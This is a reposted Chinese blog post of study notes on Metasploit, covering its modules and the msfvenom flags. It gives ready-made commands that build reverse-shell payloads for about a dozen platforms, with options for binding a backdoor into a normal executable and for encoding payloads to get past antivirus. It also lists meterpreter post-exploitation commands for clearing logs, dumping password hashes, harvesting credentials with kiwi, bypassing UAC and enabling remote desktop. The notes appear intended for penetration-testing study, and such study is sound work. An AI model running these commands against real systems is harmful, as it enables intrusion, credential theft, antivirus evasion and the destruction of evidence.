主頁 >  其他 > msf學習

msf學習

2023-04-20 07:42:59 其他

msf學習

目錄
  • msf學習
    • 一、msf核心模塊與功能
    • 二、msfvenom
      • 1、msfvenom 常用引數
      • 2、各平臺生成payload命令
    • 三、msf利用流程
    • 四、msf后滲透模塊
    • 五、后滲透提權
    • 六、后滲透獲取登錄密碼
    • 七、后滲透遠程監控
    • 八、msf編碼免殺

以kali自帶的msf為例

一、msf核心模塊與功能

msf模塊都放在/usr/share/metasploit-framework/modules目錄下

1、auxiliary

輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等)

2、encoders

編碼器模塊,主要包含各種編碼工具,對payload進行編碼加密,以便繞過入侵檢測和過濾系統

3、evasion

規避模塊,用來生成免殺payload

4、exploits

漏洞利用模塊,包含主流的漏洞利用腳本,通常是對某些可能存在漏洞的目標進行漏洞利用

5、nops

這里主要放著調整shellcode前置nop指令長度的工具

6、payloads

攻擊載荷,主要是攻擊成功后在目標機器執行的代碼,比如反彈shell的代碼

7、post

后滲透模塊,漏洞利用成功獲得meterperter之后,向目標發送的一些功能性指令,如:提權等

二、msfvenom

kali中的msfvenom取代了msf中payloads和encoders模塊

1、msfvenom 常用引數

-l
列出指定模塊的所有可用資源,模塊型別包括: payloads, encoders, nops, all

-p
指定需要使用的payload(攻擊荷載),

-f
指定輸出格式

Executable formats:Asp、aspx、aspx-exe、axis2、dll、elf、elf-so、exe、exe-only、exe-service、exe-smallhta-psh、jar、jsp、loop-vbs、macho、msi、msi-nouac、osx-app、psh、psh-cmd、psh-net、psh-reflection、python-reflection、vba、vba-exe、vba-psh、vbs、war;

Transform formats:base32、base64、bash、c、csharp、dw、dword、hex、java、js_be、js_le、num、perl、pl、powershell、ps1、py、python、raw、rb、ruby、sh、vbapplication、vbscript;

-e
指定需要使用的encoder(編碼器)編碼免殺,

-a
指定payload的目標架構

選擇架構平臺:x86 | x64 | x86_64
Platforms:windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe

-o
保存payload檔案輸出,

-b
設定規避字符集,比如: '\x00\xff'避免使用的字符

-n
為payload預先指定一個NOP滑動長度

-s
設定有效攻擊荷載的最大長度生成payload的最大長度,就是檔案大小,

-i
指定payload的編碼次數

-c
指定一個附加的win32 shellcode檔案

-x
指定一個自定義的可執行檔案作為模板
例如:原先有個正常檔案normal.exe 可以通過這個選項把后門捆綁到這個程式上面,

-k
保護模板程式的動作,注入的payload作為一個新的行程運行
例如:原先有個正常檔案normal.exe 可以通過這個選項把后門捆綁到這個程式上面,

-v
指定一個自定義的變數,以確定輸出格式

2、各平臺生成payload命令

(1)Windows

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp

LHOST=192.168.3.33 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe

(2)Mac

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=192.168.3.33 LPORT=4444 -f macho -o payload.macho

(3)Android

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -o payload.apk

(4)Powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.1.1 LPORT=8888 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

(5)Linux

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f elf -o payload.elf

(6)php

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.1 LPORT=8888 -f raw > shell.php

(7)aspx

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8888 -f aspx -o payload.aspx

(8)JSP

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.jsp

(9)war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw - o payload.war

(10)nodejs

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.js

(11)python

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.py

(12)perl

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.pl

(13)ruby

msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.rb

(14)lua

msfvenom -p cmd/unix/reverse_lua LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.lua

(15)windows shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f c

(16)linux shellcode

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f c

(17)mac shellcode

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f c

三、msf利用流程

1、前期互動

與客戶組織互動討論,確定范圍,目標等,

2、情報收集

網站域名注冊人、子域名、埠、真實ip、cms等,

3、威脅建模

理清頭緒,確定出可行的漏洞方案,

4、漏洞分析

挑選匹配可能存在的漏洞利用模塊,

5、滲透利用

找出安全漏洞,嘗試利用漏洞入侵系統,

6、后滲透階段

開始實施相關資料下載,后門維持,提權等操作,

7、報告撰寫

漏洞利用滲透測驗報告,

四、msf后滲透模塊

1、基本系統命令

background # 讓meterpreter處于后臺模式
sessions -i index # 與會話進行互動,index表示第一個session

getuid # 查看權限 
getpid # 獲取當前行程的pid
sysinfo # 查看目標機系統資訊

ps # 查看當前活躍行程
kill pid # 殺死行程
migrate pid # 將Meterpreter會話移植到行程數位pid的行程中
execute -H -i -f cmd.exe # 創建新行程cmd.exe,-H不可見,-i互動

quit # 退出會話
shell # 獲得控制臺權限
clearev # 日志清理(需要system權限)
reboot/shutdown   #重啟/關機

2、檔案操作命令

cat # 查看檔案內容
getwd # 查看當前作業目錄
upload # 上傳檔案到目標機上
download # 下載檔案到本機上
edit # 編輯檔案
search # 搜索檔案

3、網路命令

ipconfig / ifconfig # 查看網路介面資訊
Portfwd # 埠轉發 本機監聽埠 把目標機埠轉到本機埠上
Rdesktop # 使用rdesktop來連接 -u 用戶名 -p 密碼
Route # 獲取路由表資訊

五、后滲透提權

查看當前用戶權限:getuid

方法一:

meterpreter中輸入getsystem提權

方法二:

使用msf模塊提權

1、查看可用模塊,msf終端輸入search bypassuac

2、選擇一個合適當前系統的提權模塊

以win10為例:

使用use exploit/windows/local/bypassuac_windows_store_reg 嘗試提權

這個不行就換一個模塊

六、后滲透獲取登錄密碼

1、抓取自動登錄賬戶密碼

run windows/gather/credentials/windows_autologin

2、匯出SAM資料庫本地賬戶密碼檔案

run post/windows/gather/smart_hashdump

3、匯出密碼哈希

run hashdump

4、使用kiwi模塊獲取

load kiwi

creds_all:列舉所有憑據

七、后滲透遠程監控

1、使用rdesktop遠程控制(直接在終端執行)

rdesktop常用引數

引數 描述
-u 用戶名
-p 密碼
-a 16 指使用16位色顯示遠程桌面
-f 全屏模式(用Ctrl+Alt+Enter組合鍵退出)
-g 設定解析度,如:-g 1024x768
-h 幫助

例子:

rdesktop -u 用戶名 -p 密碼 -f IP地址

如果遠程計算機沒有啟動遠程功能,可以在meterpreter中輸入

run post/windows/manage/enable_rdp命令開啟遠程功能

2、通過vnc遠程(在meterpreter中執行)

run vnc

八、msf編碼免殺

1、殺軟是如何檢測出惡意代碼的?

特征碼、啟發式惡意軟體檢查和行為,

2、免殺是做什么?

對特征進行混淆,打亂代碼,避免殺毒軟體查殺

3、免殺的基本方法有哪些?

自編碼處理、自捆綁+編碼、多重編碼、介面下載式、簽名偽裝式

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/550565.html

標籤:其他

上一篇:Halcon軟體安裝與界面簡介

下一篇:CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more